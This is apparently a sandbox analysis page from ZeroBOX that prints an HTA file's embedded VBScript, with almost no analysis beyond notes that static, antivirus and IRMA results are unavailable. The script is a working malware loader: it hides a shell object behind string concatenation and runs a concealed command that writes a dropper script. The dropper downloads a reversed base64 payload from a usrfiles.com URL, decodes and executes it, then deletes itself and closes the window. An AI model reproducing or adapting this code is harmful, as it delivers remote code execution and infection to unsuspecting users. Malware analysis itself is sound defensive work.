Static | ZeroBOX
No static analysis available.
<script language="VBScript">
set MicrosoftWINdows = GetObject("n" + "e" + "w" + ":" + "F" + "9" + "3" + "5" + "D" + "C" + "2" + "2" + "-" + "1" + "C" + "F" + "0" + "-" + "1" + "1" + "D" + "0" + "-" + "A" + "D" + "B" + "9" + "-" + "0" + "0" + "C" + "0" + "4" + "F" + "D" + "5" + "8" + "A" + "0" + "B")
'EXE Arch
Dim EXcleload
EXcleload1 = "cMd /c cd %Public% &@echo Dim xxx >>hulalalMCROSOFT.vbs &@echo Set xxx = CreateObject(""Scripting.FileSystemObject"") >>hulalalMCROSOFT.vbs &@echo Set filetxt = xxx.CreateTextFile(""%Public%\o.txt"",True) >>hulalalMCROSOFT.vbs &@echo dim http_obj >>hulalalMCROSOFT.vbs &@echo dim stream_obj >>hulalalMCROSOFT.vbs &@echo dim shell_obj >>hulalalMCROSOFT.vbs &@echo set http_obj = CreateObject(""MSXML2.ServerXMLHTTP.6.0"") >>hulalalMCROSOFT.vbs &@echo set stream_obj = CreateObject(""ADODB.Stream"") >>hul"
EXcleload2 = "alalMCROSOFT.vbs &@echo set shell_obj = GetObject(""new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"") >>hulalalMCROSOFT.vbs &@echo URL = ""https://35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com/ugd/35d427_f5498afa90f14c0cb57edb202fffddfb.txt"" >>hulalalMCROSOFT.vbs &@echo http_obj.open ""GET"", URL, False >>hulalalMCROSOFT.vbs &@echo http_obj.send >>hulalalMCROSOFT.vbs &@echo stream_obj.type = 1 >>hulalalMCROSOFT.vbs &@echo stream_obj.open >>hulalalMCROSOFT.vbs &@echo stream_obj.write http_obj.responseBody >>hulalalMCROSOFT.vbs &@echo stream_obj.savetofile ""C:\User"
EXcleload3 = "s\Public\xxx.txt"", 2 >>hulalalMCROSOFT.vbs &@echo Set file = xxx.OpenTextFile(""C:\Users\Public\xxx.txt"", 1) >>hulalalMCROSOFT.vbs &@echo content = file.ReadAll >>hulalalMCROSOFT.vbs &@echo content = StrReverse(content) >>hulalalMCROSOFT.vbs &@echo Dim fso >>hulalalMCROSOFT.vbs &@echo Dim fdsafdsa >>hulalalMCROSOFT.vbs &@echo Dim oNode, fdsaa >>hulalalMCROSOFT.vbs &@echo Const adTypeBinary = 1 >>hulalalMCROSOFT.vbs &@echo Const adSaveCreateOverWrite = 2 >>hulalalMCROSOFT.vbs &@echo set oNode = CreateObject("""
EXcleload4 = "Msxml2.DOMDocument.3.0"").CreateElement(""base64"") >>hulalalMCROSOFT.vbs &@echo oNode.dataType = ""bin.base64"" >>hulalalMCROSOFT.vbs &@echo oNode.text = content >>hulalalMCROSOFT.vbs &@echo set fdsaa = CreateObject(""ADODB.Stream"") >>hulalalMCROSOFT.vbs &@echo fdsaa.Type = adTypeBinary >>hulalalMCROSOFT.vbs &@echo tempdir = CreateObject(""WScript.Shell"").ExpandEnvironmentStrings(""%Public%\yyyy.txt"") >>hulalalMCROSOFT.vbs &@echo LocalFile = tempdir >>hulalalMCROSOFT.vbs &@echo fdsaa.Open >>hulalalMCROSOFT.vbs &@echo fd"
EXcleload5 = "saa.Write oNode.nodeTypedValue >>hulalalMCROSOFT.vbs &@echo fdsaa.savetoFile LocalFile,adSaveCreateOverWrite >>hulalalMCROSOFT.vbs &@echo set fso = CreateObject(""Scripting.FileSystemObject"") >>hulalalMCROSOFT.vbs &@echo set fdsafdsa= GetObject(""new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"") >>hulalalMCROSOFT.vbs &@echo if (fso.FileExists(LocalFile)) then >>hulalalMCROSOFT.vbs &@echo fdsafdsa.Exec(LocalFile) >>hulalalMCROSOFT.vbs &@echo End if >>hulalalMCROSOFT.vbs& hulalalMCROSOFT.vbs &dEl hulalalMCROSOFT.vbs"
EXcleload = EXcleload1 + EXcleload2 + EXcleload3 + EXcleload4 + EXcleload5
MicrosoftWINdows _
Run EXcleload, vbHide
Window.ReSizeTo 0, 0
self.close
</script>
No antivirus signatures available.
No IRMA results available.